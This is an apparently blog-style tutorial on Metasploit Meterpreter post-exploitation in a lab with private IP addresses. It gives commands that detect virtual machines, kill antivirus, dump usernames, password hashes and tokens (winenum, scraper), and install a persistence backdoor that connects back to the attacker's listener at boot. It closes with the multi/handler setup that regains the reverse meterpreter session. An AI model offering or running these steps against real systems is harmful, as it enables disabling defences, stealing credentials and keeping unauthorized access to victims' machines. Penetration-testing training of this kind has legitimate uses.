11/16/2013

Metasploit 5

Metasploit 5


Meterpreter part 2


8- checkvm
To check if the remote system is a Vitrual machine

run checkvm

The target system is actually a virtual machine ruuning on VMware

9- killav
To kill antivirus

run killav


10- windows enumration
Collecting all information about the target machine such as (username , running process , tokens, network information , hardware information,groups, network route,firewall configuration,hash passwords, etc...)

run winenum


As mentioned the output is located in /root/.msf4/logs/scripts/winenum/BTRACK .....
To view the tokens



11- scraper
To collect information about the target machine such as (username , hash passwords, system info , etc...)

run scraper



12- persistence (backdoor)
Persistence is a backdoor allow you to connect back again anytime to the victim machine , because the user may patch the vulnerable services and you no longer can access to victim machine easily
so you have to install a backdoor on the victim machine to get access easily anytime

To list all options
persistence -h

-A Automatically start a machine multi/handler to connect to the agent
-L Location in target host where to write payload, if none %TEMP% will be used
-P Payload to use, default is windows/meterpreter/reverse_tcp
-S Automatically start the agent on boot as a service(with SYSTEM privileges)
-T Alternate executable templete to use
-U Automatically start the agent when the user logs on
-X Automatically start the agent when the system boots
-h This help menu
-i The interval in seconds between each connection attempt
-p The port on the remote host where Metasploit is listening
-r The IP of the system running Metasploit listening for the connect back

To install persistence backdoor on the victim machine

run persistence -X -i 40 -p 4445 -r 192.168.0.229



Now the backdoor is installed on the victim machine

Now we kill the session to see if the persistence can connect back to the local host (attacker)

To show all open sessions
session -l
suppose that the open session with the victim (192.168.0.227) is session 1
now let's kill session 1
session -k 1

Now we lost the connection with the victim machine

To connect back by using backdoor we must first run multi/handler to listen and wait for a reverse connection from backdoor

use exploit/multi/handler

Then let's set the local address and local port
set LHOST 192.168.0.229
set LPORT 4445
Then
exploit


And we have a meterpreter session again ...